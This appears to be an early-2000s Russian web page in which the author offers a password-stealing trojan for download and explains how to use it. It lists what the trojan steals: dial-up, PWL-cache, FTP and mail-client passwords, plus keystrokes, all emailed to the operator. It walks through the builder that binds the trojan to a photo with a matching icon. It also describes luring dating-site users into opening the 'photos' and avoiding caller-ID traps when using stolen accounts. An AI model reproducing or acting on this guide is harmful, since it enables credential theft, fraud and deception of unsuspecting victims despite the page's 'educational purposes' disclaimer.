Вот сделал очередное обновление. Решены проблемы с отправкой мыла, теперь мы не используем SMTP, работать должно со всеми мылами.
Комплект: m2_15_setup.exe, m2_15_jpg.exe, m2_15_com.exe (несколько модификаций с разными иконками), и конфигуратор.
Скачать (Замените расширение "zp" на "zip")
Внимание! Программа создана исключительно в образовательных целях. Автор не несёт на себе ответственность
за её использование, действуйте на свой страх и риск.
Возможности:
Присоединение к любым другим файлам!
Тащит диалап пароли из TheBat!'а
Добавлен кейлоггер!!
ДиалАп пароли с телефонами, логинами, со скриптами, и с dns серверами.
Пароли из PWL кеша.
Пароли из EDialer'а, теперь они расшифровываются!
Пароли от Windows commander'а.
Определяет версию ОС.
Определяет используемое соединение(если это ДиалАп).
Определяет используемое устройство, для выхода в инет.
Какнить чего ещо добавлю, пишите ваши пожелания мне на мыло
myztic@mail.ru
При обнаружении коня всякими антивирусами или ещо какими антитроянскими прогами, просьба проинформировать
меня об этом, будем принимать меры :)
Так же большая просьба сообщать мне обо всяких глюках и багах, если таковые обнаружаться
Навигация по сайту:
Для получения ДиалАп паролей динамически подгружается Rasapi32.dll, и импортируются
функции RasGetEntryProperties и RasGetEntryDialParams, которые достают пароли, телефоны и
прочие скрипты из маздаевской телефонной книги.
Для получения паролей из PWL файлов в маздайе предусмотренна специальная функция
WNetEnumCachedPasswords, которая импортируется из mpr.dll динамически.
FTP пароли от WindowsCommander'а берутся из ини файла wcx_ftp.ini, который лежит
в маздай папке. Как пользоваться этими паролями?
Ставите себе WindowsCommander 4.0, делаете ftp соединение с каким нить паролем, лезете в
маздай папку и ищите файл wcx_ftp.ini, открываете его и находите то соединение, какое вы только что
сделал, ищите там строку с паролем, она должна выглядеть типа :A54F435E3D234A876BA469,
и меняете её на ту что пришла вам, естессно ftp сервер должен быть то же что вам пришло.
Что надо делать после конфигурации и как впаривать коня.
Если вдруг вам понадобилось сменить иконку, в инете есть рульная прога MicroAngelo.
Приведу один пример не плохого способа как впаривать коня всяким ламерам. Идёте на сервер знакомств(
www.mheart.ru, www.fortuna.ru,
www.kiss.ru, и др.), и пишите всем подряд, типа "меня зовут так-то, я
бы хотел с тобой познакомиться, и т.д. и т.п.(конешно про себя писать не надо, нужно чо нить придумать :),
и прикладываете к письму свои фотки, ну тоесть коня, лучше присоединить к нему риальную фотку.
Ваша безопасность
В последнее время, злые дядьки-админы разных провайдеров стали ставить на свои момедные пулы АОНы.
Это очень сильно обламывает, т.к. это реальная опасность быть пойманым, в лучшем случае вам просто
позвонит владелец аккаунта, и предложит вернуть не много денег, за его спизженные часы, ну а в худшем
вам могут позвонить в дверь дядьки в форме.
Как всё таки определить наличие АОНа
Очень просто. Звоните на момедный номер телефоном, и слушаете как там снимают трубку, обычно без АОНа
это выглядит как один двойной щелчок, а с АОНом слышно два двойных щелчка, сначала трубу снимает АОН(или модем),
происходит один двойной щелчок, а потом сам модем(или АОН), и сразу слышен ещо один двойной щелчок.
Для тренировки позвоните на 9955555, и вы сразу поймёте, как звучат АОНы.
Небольшой список телефонов с АОНами
9955555, 9955556 - MTU
9951111 - Cityline
Конешно на Citylen'е есть ещо другие телефоны, но к сожелению всех их я не проверял,
знаю точно что на ситулине есть телефон 9133949 без АОНа (если ещо его туда не поставили :)
Некоторые диапазоны сетей провайдеров.
Например вам пришли пароли, и в письме указан ипи, ну например 212.188.***.***,
По этому ипи адресу можно определить провайдера.
Вот некоторые диапазоны сетей которые я помню:
Сюда вы вписываете свое мыло, на которое будут приходить пароли.
To(second): Сюда можно вписать второе мыло, на которое будут приходить пароли, введено на всякий случай,
если не удается отправить по первому мылу. Желательно что б это мыло было в другом домэне чем первое.
Description:
Просто название, или уникальное имя, или ид, вашего коня
Урл для апдейта:
Функция пока временно не работает.
Через сколько дней повторять посылку:
Через сколько дней слать пароли, например есть это 5-ть,
то пароли будут приходить каждые 5-ть дней, рекомендуемое значение 4-6. Диапазон допустимых вводимых значений 1-7
Нажимаете кнопку Browz, выбираете коня, и жмёте кнопку Create. Всё! сконфигуренный конь лежит в папке InfeCteD и готов к использованию.
Attach:
Присоединяемый файл. Для лучшего эффекта рекомендуется что бы иконки у трояна и у присоединяемого файла были ОДИНАКОВЫЕ!
Обозначения:
:os: - Операционная система
:cp: - Имя комьютера
:usr: - Имя юзера
:ip: - Ипи Адрес, например: lamer@dialup184.mtu-net.ru[218.188.45.0]
:uc: - Название соединения(если ДиалАп)
:dv: - Девайс для выхода в инет и название девайса
> Название соединения: # код страны (код города) телефон L: логин P: пароль
:dn: - Домен для этого соединения(если есть)
:dns: - Днс1 и Днс2 для этого соединения(если есть)
:sc: - Скрипт к этому соединению(если есть)
:ed pass: - Пароль из EDialer'а для этого соединения (если он установлен и если пароль сохранён)
:thebat!: - Диалап пароли из TheBat!'а
:rna: - Пароли из PLW кэша
:wcp: - Пароли из WindowsCommaner'а(ини файл)
:kl: - Лог кейлоггера
Ссылки:
Если вы хотите обменяться ссылками или банерами, мыльте мне или договаримся по ICQ